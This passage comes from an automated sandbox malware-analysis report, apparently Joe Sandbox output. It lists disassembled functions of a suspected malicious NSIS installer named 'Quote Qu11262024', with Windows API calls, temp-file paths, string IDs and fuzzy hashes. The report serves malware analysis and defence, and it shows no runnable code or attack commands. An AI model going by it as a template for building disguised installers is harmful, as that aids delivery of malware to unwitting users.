                                                                                                      • Part of subcall function 004051FB: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp\System.dll), ref: 00405269
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                    • CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D9C
                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 00402DAA
                                                                                                      • Part of subcall function 00402CF8: MulDiv.KERNEL32(000640B6,00000064,0006454F), ref: 00402D0D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                    • String ID: ... %d%%
                                                                                                    • API String ID: 722711167-2449383134
                                                                                                    • Opcode ID: be53b0c81ea543e3db9248fbbb60bb4de53875aaabd4ac96cfbf43620bc9dcee
                                                                                                    • Instruction ID: ef8eed0ec1e1a84a002a1e67416108222ae87c27a2fbfe946e473021573d6626
                                                                                                    • Opcode Fuzzy Hash: be53b0c81ea543e3db9248fbbb60bb4de53875aaabd4ac96cfbf43620bc9dcee
                                                                                                    • Instruction Fuzzy Hash: FC018430505610EBCB22AB65EF0DADF7A68FF05706B04403BF945B11E0CBB84C41DAAD
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AE1
                                                                                                    • GetMessagePos.USER32 ref: 00404AE9
                                                                                                    • ScreenToClient.USER32(?,?), ref: 00404B03
                                                                                                    • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B15
                                                                                                    • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B3B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                    • String ID: f
                                                                                                    • API String ID: 41195575-1993550816
                                                                                                    • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                    • Instruction ID: 9ec2eb1330efd27cea2dc672471069c57dcd17466ea5ac0e7eb7993aba0fe251
                                                                                                    • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                    • Instruction Fuzzy Hash: 4E014C71900219BAEB00DBA4DD85BFEBBBCAF55711F10412BBB50B61D0C7B4A9018BA4
                                                                                                    APIs
                                                                                                    • GetDC.USER32(?), ref: 00401D9E
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DD1
                                                                                                    • CreateFontIndirectA.GDI32(0040B800), ref: 00401E20
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                    • String ID: Times New Roman
                                                                                                    • API String ID: 3808545654-927190056
                                                                                                    • Opcode ID: 82f43aa7a31e903e46d50b40f5da2113c8ab0205a6395b373c449f62828ebaa8
                                                                                                    • Instruction ID: 810937ae9080f590f54b77349243ed1ca62fcdae25a9dc42187aa6aa1688f7d7
                                                                                                    • Opcode Fuzzy Hash: 82f43aa7a31e903e46d50b40f5da2113c8ab0205a6395b373c449f62828ebaa8
                                                                                                    • Instruction Fuzzy Hash: FB014472945244AFE7006BB0AE49B9A3FF8EB55305F148839F141B62F2CB7905458B6D
                                                                                                    APIs
                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C97
                                                                                                    • wsprintfA.USER32 ref: 00402CCB
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402CDB
                                                                                                    • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CED
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                    • API String ID: 1451636040-1158693248
                                                                                                    • Opcode ID: 77b2be4c33972075b46706dcadaaaf4812fd02cffaa33e9a7d579d75a3179346
                                                                                                    • Instruction ID: 00f793533a20a7d44d75197907a1701575304e439739864cb4e0d2fe2ab89f6b
                                                                                                    • Opcode Fuzzy Hash: 77b2be4c33972075b46706dcadaaaf4812fd02cffaa33e9a7d579d75a3179346
                                                                                                    • Instruction Fuzzy Hash: 1DF0317050020CFBEF245F61CE0ABAE3769EB04344F00803EFA16B51D0DBB899559F59
                                                                                                    APIs
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E240B
                                                                                                      • Part of subcall function 738E1224: lstrcpynA.KERNEL32(00000000,?,738E12CF,-738E404B,738E11AB,-000000A0), ref: 738E1234
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 738E2386
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 738E239B
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000010), ref: 738E23AC
                                                                                                    • CLSIDFromString.OLE32(00000000,00000000), ref: 738E23BA
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E23C1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2348832635.00000000738E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 738E0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2348743779.00000000738E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348882252.00000000738E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348981073.00000000738E5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                    • String ID:
                                                                                                    • API String ID: 3730416702-0
                                                                                                    • Opcode ID: 6e231fd6d72b954e5c09839f12c190c10a87d4dd2a2df069273b36412a75ab17
                                                                                                    • Instruction ID: 7c6a8749be0b949f49d8da5d0837e9d9195cb6badc376fad71f8c1473fb2506a
                                                                                                    • Opcode Fuzzy Hash: 6e231fd6d72b954e5c09839f12c190c10a87d4dd2a2df069273b36412a75ab17
                                                                                                    • Instruction Fuzzy Hash: 2B419E72588718DFE311EFA5C840B2AB7EAFB42321F14882EEA4AD7181D7709945CB61
                                                                                                    APIs
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
                                                                                                    • GlobalFree.KERNEL32(?), ref: 004027EB
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 004027FE
                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
                                                                                                    • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 2667972263-0
                                                                                                    • Opcode ID: 09af991afbbcf3d88ab4d6b8935225f7f657d52982f43ceb1638312001f01e92
                                                                                                    • Instruction ID: 251c30b32f8bc52cb02f612f53af1c06d39ab9b455335e0d0e57135b7b4c512f
                                                                                                    • Opcode Fuzzy Hash: 09af991afbbcf3d88ab4d6b8935225f7f657d52982f43ceb1638312001f01e92
                                                                                                    • Instruction Fuzzy Hash: F4219F71800124BBDF207FA5DE49EAE7A79EF45364F14823EF520762E0CB7949018FA8
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(Softwoods Setup: Installing,Softwoods Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048D7,000000DF,00000000,00000400,?), ref: 00404A5A
                                                                                                    • wsprintfA.USER32 ref: 00404A62
                                                                                                    • SetDlgItemTextA.USER32(?,Softwoods Setup: Installing), ref: 00404A75
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                    • String ID: %u.%u%s%s$Softwoods Setup: Installing
                                                                                                    • API String ID: 3540041739-1740017590
                                                                                                    • Opcode ID: 6788e77db0ed70820922f796094b0f7d358b60e9da6c4bbe0540f4a3efed0ed0
                                                                                                    • Instruction ID: ba59289b4e1d69b0e9226f0d24e2fd9302e291b2b78ff081cbe6c40e89f38270
                                                                                                    • Opcode Fuzzy Hash: 6788e77db0ed70820922f796094b0f7d358b60e9da6c4bbe0540f4a3efed0ed0
                                                                                                    • Instruction Fuzzy Hash: 7611EB73A4412437DB10666D9D41EAF3298DB85378F25423BFA26F31D1ED79CC1291A8
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2348832635.00000000738E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 738E0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2348743779.00000000738E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348882252.00000000738E3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2348981073.00000000738E5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeGlobal
                                                                                                    • String ID:
                                                                                                    • API String ID: 2979337801-0
                                                                                                    • Opcode ID: 13db570cbbb98724cf9604a1235cc6de88ed41ff06f0d72ac0c2f1c10e6847b6
                                                                                                    • Instruction ID: 8e6c537c6d2166022700cab2430d924aa23905e7d23a46e21ef753fa89832821
                                                                                                    • Opcode Fuzzy Hash: 13db570cbbb98724cf9604a1235cc6de88ed41ff06f0d72ac0c2f1c10e6847b6
                                                                                                    • Instruction Fuzzy Hash: 6751F332EC425DABDB12AFF8C8417BDBBBBAB47601F6840DAD507E3184C6719A41C751
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?), ref: 00401D45
                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D52
                                                                                                    • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
                                                                                                    • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401D90
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 1849352358-0
                                                                                                    • Opcode ID: 906cc3c9dc1ea644a8f0b9f63b90a22fdde369fe453557b56cb49a54f3b86423
                                                                                                    • Instruction ID: a13b5a5d39b080b734a87188ea61078e2d8a06182c0907a8ae2338f0aa50a120
                                                                                                    • Opcode Fuzzy Hash: 906cc3c9dc1ea644a8f0b9f63b90a22fdde369fe453557b56cb49a54f3b86423
                                                                                                    • Instruction Fuzzy Hash: B4F0ECB2600515AFDB00ABA4DE89DAEB7BCEB44305B04446AF641F2191CA748D018B38
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403315,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040353A,?,00000006,00000008,0000000A), ref: 00405A72
                                                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403315,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040353A,?,00000006,00000008,0000000A), ref: 00405A7B
                                                                                                    • lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405A8C
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A6C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                    • API String ID: 2659869361-3936084776
                                                                                                    • Opcode ID: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                                                                    • Instruction ID: 6dc39642320d7211da8564ce4557d80ed2f810c62d9db5911cdea7bca2d72c9f
                                                                                                    • Opcode Fuzzy Hash: 00f54151576635bf1518ba316310c1363eddf8ffcac7d82473bc198909657139
                                                                                                    • Instruction Fuzzy Hash: A9D022A3345A303BD202A7198C09ECF2A0C8F06304B06403BF241B21A2CB3C4D528BFE
                                                                                                    APIs
                                                                                                    • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,?,00405B71,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,76233410,?,76232EE0,004058BC,?,76233410,76232EE0,00000000), ref: 00405B13
                                                                                                    • CharNextA.USER32(00000000), ref: 00405B18
                                                                                                    • CharNextA.USER32(00000000), ref: 00405B2C
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\nsh4D29.tmp, xrefs: 00405B06
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharNext
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsh4D29.tmp
                                                                                                    • API String ID: 3213498283-4005109940
                                                                                                    • Opcode ID: b96409ec6a39fa3d56b4e782eb7cea7ed522888b6d3475bd37c87274fae6ba73
                                                                                                    • Instruction ID: 58a0fdf892bcb1d778ddd51627870ff6d63c772e50997ff54bf1ebb118cfa6b8
                                                                                                    • Opcode Fuzzy Hash: b96409ec6a39fa3d56b4e782eb7cea7ed522888b6d3475bd37c87274fae6ba73
                                                                                                    • Instruction Fuzzy Hash: 45F0CD51915F646AFF2266680C64B67ABA8CF56350F08407BE280B72C2C27878448FAA
                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,00403647,?,?,00000006,00000008,0000000A), ref: 00403822
                                                                                                    • CloseHandle.KERNEL32(000002D8,C:\Users\user\AppData\Local\Temp\,00403647,?,?,00000006,00000008,0000000A), ref: 00403836
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403815
                                                                                                    • C:\Users\user\AppData\Local\Temp\nsh4D29.tmp, xrefs: 00403846
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2291520028.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291550889.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291566534.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2291712724.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsh4D29.tmp
                                                                                                    • API String ID: 2962429428-354183335
                                                                                                    • Opcode ID: 3e03b8fcc2b2b5594924f877e54a01a439d81205cd2b365e48e78999fc4b20a2
                                                                                                    • Instruction ID: fca1cb84d8637f00264f47cb00cc5f282fdab3f2b8ec4a9f47ee572bb6ec7ba9
                                                                                                    • Opcode Fuzzy Hash: 3e03b8fcc2b2b5594924f877e54a01a439d81205cd2b365e48e78999fc4b20a2
                                                                                                    • Instruction Fuzzy Hash: 4DE0863250071896C520BF7CBD498853B599B413317248776F138F21F0C73899574AED
                                                                                                    APIs
                                                                                                      • Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033FA,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060E1
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,?,00405B71,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,76233410,?,76232EE0,004058BC,?,76233410,76232EE0,00000000), ref: 00405B13
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C
                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,76233410,?,76232EE0,004058BC,?,76233410,76232EE0,00000000), ref: 00405BAD
                                                                                                    • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,C:\Users\user\AppData\Local\Temp\nsh4D29.tmp,76233410,?,76232EE0,004058BC,?,76233410,76232EE0), ref: 00405BBD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2291534383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
